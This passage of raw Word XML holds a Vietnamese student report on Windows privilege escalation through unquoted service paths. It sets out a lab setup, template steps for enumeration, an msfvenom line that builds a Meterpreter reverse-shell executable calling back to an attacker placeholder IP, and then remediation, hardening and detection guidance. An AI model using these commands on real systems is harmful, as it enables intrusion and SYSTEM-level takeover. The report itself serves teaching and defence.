      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.3. Tác hại và hậu quả đối với an toàn hệ thống doanh nghiệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7AA3C">
      <w:r>
        <w:t>Nếu bị khai thác thành công, hậu quả đối với doanh nghiệp là vô cùng thảm khốc. Kẻ tấn công từ quyền một nhân viên bình thường hoặc một tiến trình mã độc ban đầu có thể thực thi mã độc với đặc quyền SYSTEM. Tại mức đặc quyền này, kẻ tấn công có thể vô hiệu hóa hoàn toàn các giải pháp phòng thủ như Windows Defender, Antivirus, EDR; cài đặt các phần mềm gián điệp, rootkit chạy ngầm; trích xuất toàn bộ cơ sở dữ liệu mật khẩu cục bộ (SAM database, LSASS memory); từ đó làm bàn đạp tấn công leo thang sang các máy chủ khác (Lateral Movement), chiếm đoạt tài khoản Domain Admin và kiểm soát toàn bộ hạ tầng doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26416B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990BAE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 3: QUY TRÌNH THỰC NGHIỆM VÀ KẾT QUẢ KHAI THÁC TRÊN PHÒNG THÍ NGHIỆM (LAB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704883E5">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1. Thiết lập mô hình phòng thực nghiệm (Lab Architecture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B050AA">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1.1. Sơ đồ kiến trúc và thông số cấu hình mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FBF12B">
      <w:r>
        <w:t>Hệ thống thực nghiệm được xây dựng cô lập trên môi trường ảo hóa nhằm đảm bảo an toàn. Thành phần mô hình Lab bao gồm:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Máy tấn công (Attacker Machine): Hệ điều hành Parrot Security OS (hoặc Kali Linux), cấu hình card mạng chế độ NAT/Host-Only, cài đặt sẵn bộ công cụ Metasploit Framework, Nmap.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Máy mục tiêu (Target Machine): Hệ điều hành Windows 10/11 hoặc Windows Server, tạo một tài khoản người dùng thông thường tên 'low_priv_user' không thuộc nhóm Administrators.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>[MỤC CHỪA TRỐNG: Sinh viên tự chèn hình ảnh Sơ đồ thiết lập Lab hoặc bảng thông số IP của các máy ảo tại đây].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DAD11">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1.2. Quy trình giả lập dịch vụ lỗi phục vụ nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB5110">
      <w:r>
        <w:t>Để phục vụ nghiên cứu, tiến hành tạo một thư mục giả lập lỗi bằng quyền quản trị tối cao ban đầu: `C:\Program Files\Enterprise Software\Advanced Agent\` và đăng ký một Windows Service có tên 'VulnerableAgent' với ImagePath không có dấu ngoặc kép. Đồng thời, tiến hành nới lỏng phân quyền (ACL) trên thư mục bằng lệnh `icacls` để cho phép nhóm Authenticated Users có quyền Ghi (M quyền này mô phỏng lỗi thực tế của một số phần mềm bên thứ ba khi cài đặt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1C97A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2. Tiến trình triển khai các bước khai thác leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57128947">
      <w:r>
        <w:t>[NỘI DUNG ĐỂ TRỐNG - SINH VIÊN TỰ ĐIỀN CÁC BƯỚC THỰC HIỆN VÀ CHỤP ẢNH MINH CHỨNG LAB THỰC TẾ CỦA BẢN THÂN VÀO CÁC MỤC CON DƯỚI ĐÂY]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31624ED9">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2.1. Bước 1: Thu thập thông tin và phát hiện dịch vụ lỗi (Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50425DFD">
      <w:r>
        <w:t>Sinh viên điền nội dung thực tế chạy lệnh CMD để tìm dịch vụ lỗi:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>[MỤC CHỪA TRỐNG: Chèn ảnh chụp màn hình CMD hiển thị dịch vụ lỗi phát hiện được].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961E0B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2.2. Bước 2: Kiểm tra cấu hình phân quyền ACL của các thư mục cha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7801D971">
      <w:r>
        <w:t>Sinh viên mô tả việc sử dụng lệnh `icacls` hoặc công cụ `accesschk.exe` của Sysinternals để xác định xem tài khoản đặc quyền thấp có quyền (W) hay (M) vào thư mục cài đặt hay không.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Ví dụ lệnh: accesschk.exe -uwdq "C:\Program Files\Enterprise Software"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>[MỤC CHỪA TRỐNG: Chèn ảnh chụp kiểm tra phân quyền thành công].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE9291">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2.3. Bước 3: Phát triển payload độc hại và đưa vào vị trí chuỗi phân giải</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3129D7">
      <w:r>
        <w:t>Sinh viên điền quá trình sử dụng lệnh `msfvenom` trên máy tấn công để tạo tệp thực thi mã độc mã hóa ngược (Reverse Shell) dạng exe và đặt tên tệp trùng với chuỗi phân giải logic lỗi (ví dụ: `Enterprise.exe`).</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Ví dụ lệnh: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_Attacker] LPORT=4444 -f exe &gt; Enterprise.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>[MỤC CHỪA TRỐNG: Mô tả và chèn ảnh chụp quá trình tạo, upload cấy file payload vào thư mục nạn nhân].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5AE2D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2.4. Bước 4: Kích hoạt thực thi mã độc và kiểm tra kết quả nâng quyền (Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F9BBD">
      <w:r>
        <w:t>Mô tả quá trình kích hoạt mã độc (Bằng cách khởi động lại máy ảo Windows hoặc thực hiện lệnh khởi động lại dịch vụ nếu user có quyền restart dịch vụ). Đồng thời mở trình lắng nghe (listener/handler) trên máy tấn công để nhận kết nối trả về dưới quyền SYSTEM.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>[MỤC CHỪA TRỐNG: Chèn ảnh chụp màn hình kết quả gõ lệnh `whoami` trên session thu được hiển thị kết quả là NT AUTHORITY\SYSTEM].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED43F2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA295B1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 4: ĐỀ XUẤT GIẢI PHÁP PHÒNG NGỪA VÀ KHẮC PHỤC TOÀN DIỆN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D4D69">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1. Giải pháp kỹ thuật sửa lỗi cục bộ (Remediation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F12F58">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1.1. Khắc phục thủ công thông qua Registry Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044DD14">
      <w:r>
        <w:t>Quản trị viên hệ thống sử dụng công cụ Registry Editor (regedit.exe) di chuyển chính xác đến khóa quản lý dịch vụ lỗi tại: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[Tên_Dịch_Vụ]. Tiến hành chỉnh sửa chuỗi giá trị (String Value) có tên 'ImagePath' bằng cách thêm cặp dấu ngoặc kép bao quanh toàn bộ đường dẫn thực thi. Ví dụ, sửa đổi từ chuỗi lỗi:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>C:\Program Files\Enterprise Software\Advanced Agent\service.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Thành chuỗi an toàn tuyệt đối:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>"C:\Program Files\Enterprise Software\Advanced Agent\service.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25828515">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1.2. Tự động hóa khắc phục hàng loạt bằng PowerShell Script trong doanh nghiệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4E61E">
      <w:r>
        <w:t>Để triển khai trên quy mô lớn lên tới hàng ngàn máy trạm và máy chủ trong doanh nghiệp, việc sửa thủ công là bất khả thi. Giải pháp tối ưu là xây dựng một đoạn mã PowerShell script tự động quét toàn bộ Registry ImagePath, phát hiện các chuỗi chứa khoảng trắng nhưng thiếu dấu ngoặc kép để bọc lại tự động.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Quản trị viên có thể đóng gói script này và triển khai đồng bộ thông qua Group Policy Object (GPO) hoặc hệ thống Microsoft Endpoint Configuration Manager (SCCM) trên toàn mạng nội bộ doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A39BA6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2. Giải pháp cấu hình an toàn hệ thống nâng cao (Hardening)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E325C21">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2.1. Tối ưu hóa phân quyền thư mục theo Nguyên tắc Đặc quyền tối thiểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8B15A">
      <w:r>
        <w:t>Áp dụng triệt để nguyên lý đặc quyền tối thiểu (Principle of Least Privilege). Mặc dù lỗ hổng phát sinh ở khâu ngoặc kép đường dẫn, kẻ tấn công chỉ có thể khai thác thành công nếu thư mục cho phép ghi file. Quản trị viên hệ thống cần rà soát lại quyền hạn ACL, tuyệt đối không cấp quyền Write, Modify, hoặc Full Control cho các nhóm người dùng thông thường (`Users`, `Authenticated Users`, `Everyone`) tại các thư mục gốc của hệ thống (ổ C:\) và các thư mục cài đặt phần mềm dùng chung (`C:\Program Files`, `C:\Program Files (x86)`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933F89B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2.2. Kiểm soát quy trình kiểm thử và triển khai phần mềm (DevSecOps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465EA7F2">
      <w:r>
        <w:t>Đưa tiêu chuẩn an toàn thông tin vào quy trình phát triển và triển khai ứng dụng của doanh nghiệp. Yêu cầu các bên đối tác cung cấp phần mềm phải sử dụng trình cài đặt chuẩn hóa (ví dụ sử dụng bộ tạo cài đặt Wix Toolset hoặc Advanced Installer tuân thủ chuẩn Microsoft), luôn tự động kiểm tra việc đặt ngoặc kép khi đăng ký khóa dịch vụ hệ thống trước khi nghiệm thu đưa phần mềm vào vận hành thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1B9B2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3. Giải pháp Giám sát và Kỹ nghệ Phát hiện sự cố (Detection Engineering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF289C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3.1. Giám sát tiến trình hệ thống qua Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D443E7">
      <w:r>
        <w:t>Kích hoạt chính sách nâng cao Audit Process Creation trong Local Group Policy để ghi nhận lại mã sự kiện Windows Event ID 4688 (A new process has been created) đi kèm thông tin chi tiết dòng lệnh (Command Line Logging). Ngoài ra, theo dõi chặt chẽ mã sự kiện Event ID 7045 (A service was installed in the system) từ nguồn log System. Bất kỳ hành vi tạo ra một file thực thi bất thường nằm ở thư mục cha (ví dụ như tệp tin `C:\Program.exe` hoặc `C:\Program Files\Enterprise.exe`) khởi chạy dưới quyền SYSTEM đều phải được cấu hình cảnh báo mức độ nghiêm trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20282699">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3.2. Xây dựng luật phát hiện SIEM và kiểm soát EDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08936E48">
      <w:r>
        <w:t>Xây dựng và cấu hình các bộ quy tắc phát hiện (vd: Sigmarules, SIEM correlation rules) nhằm tự động truy vấn tương quan dữ liệu tập trung thu thập từ các máy trạm về trung tâm SOC. Luật phát hiện sẽ thực hiện tìm kiếm logic: Phát hiện tiến trình nhị phân được thực thi từ một thư mục cha nhưng tên tệp tin lại trùng với phần đầu trước khoảng trắng của một dịch vụ đã đăng ký. Tận dụng sức mạnh của giải pháp EDR (Endpoint Detection and Response) doanh nghiệp để ngăn chặn (block) ngay lập tức hành vi cấy file nhị phân lạ vào các thư mục hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D0E1B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C66825">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBD130">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AD019">
      <w:r>
        <w:t>Sau khoảng thời gian nghiên cứu lý thuyết kết hợp thực nghiệm thực tế tại đơn vị thực tập, đề tài nghiên cứu kỹ thuật leo thang đặc quyền thông qua lỗ hổng Unquoted Service Path đã hoàn thành đầy đủ các mục tiêu đề ra ban đầu. Báo cáo đã làm rõ bản chất của một lỗi cấu hình sai tưởng chừng rất nhỏ nhưng lại mang một nguy cơ mất an toàn thông tin đặc biệt nghiêm trọng trong môi trường doanh nghiệp. Việc triển khai thành công phòng thực nghiệm mô phỏng lại toàn bộ chuỗi tấn công đã giúp bản thân củng cố tư duy của một chuyên gia kiểm thử xâm nhập (Pentester), đồng thời các phương án phòng thủ đa tầng đề xuất trong báo cáo hoàn toàn có thể ứng dụng trực tiếp vào thực tế để tăng cường năng lực an ninh bảo mật cho tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E597F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ưu điểm và hạn chế của đề tài nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360E4C3">
      <w:r>
        <w:t>- Ưu điểm: Báo cáo có chiều sâu lý thuyết vững chắc dựa trên tài liệu quốc tế uy tín; giải pháp đưa ra mang tính thực tiễn cao, có khả năng tự động hóa hàng loạt quy mô lớn.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Hạn chế: Thực nghiệm mới chỉ tiến hành giới hạn trong phòng Lab ảo hóa cách ly với các công cụ tạo payload tiêu chuẩn cơ bản; chưa phân tích sâu các biến thể kỹ thuật bypass nâng cao khi hệ thống bật các cơ chế bảo vệ nghiêm ngặt của bên thứ ba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EC153">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hướng phát triển mở rộng của đề tài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC35500">
      <w:r>
        <w:t>Trong tương lai, đề tài có thể mở rộng nghiên cứu sang các kỹ thuật chiếm quyền điều khiển luồng thực thi (Execution Flow Hijacking) phức tạp và tinh vi hơn trên hệ điều hành Windows như: Kỹ thuật cấy thư viện liên kết động độc hại (DLL Hijacking), chiếm quyền đối tượng COM (COM Hijacking), hoặc nghiên cứu phát triển mã độc tùy biến (Custom Malware) có khả năng vượt qua (bypass) hoàn toàn các giải pháp giám sát EDR thế hệ mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E637D0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C7B08">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE88799">
      <w:r>
        <w:t>[1] EC-Council, Official Courseware of Certified Ethical Hacker (CEH v13) - Module 06: System Hacking (Privilege Escalation Techniques).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F0695">
      <w:r>
        <w:t>[2] MITRE ATT&amp;CK Framework, Tri thức mã hóa kỹ thuật tấn công - 'T1574.009: Hijack Execution Flow: Path Interception by Unquoted Path'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B8F4B2">
      <w:r>
        <w:t>[3] Microsoft Developer Network (MSDN) Documentation, 'CreateProcessA function (processthreadsapi.h) - Application Path and Parameters Parsing Logic'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3F6A0">
      <w:r>
        <w:t>[4] Mark Russinovich, Windows Sysinternals Suites - Tài liệu hướng dẫn sử dụng bộ công cụ quản trị nâng cao `AccessChk` và `Icacls` trên Windows Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEE412">
      <w:r>
        <w:t>[5] Các kho lưu trữ mã nguồn mở chuẩn quốc tế (GitHub Repositories) về pentest và audit an toàn hệ thống Windows: winPEAS, PowerUp - PrivEsc Checklists.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AB14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3965</Words>
  <Characters>16554</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>20404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Huy Dương</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T16:37:49Z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eyJoZGlkIjoiNzhjNDI5MTE5NDgzNTYxMDhiZWU2YjA3ZjNkZDA4NjEiLCJ1c2VySWQiOiIxMzkyMTUwODczNjQyIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26372</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>5552451A3CB84163B43ED4820B6E2B41_12</vt:lpwstr>
  </property>
</Properties>
</file>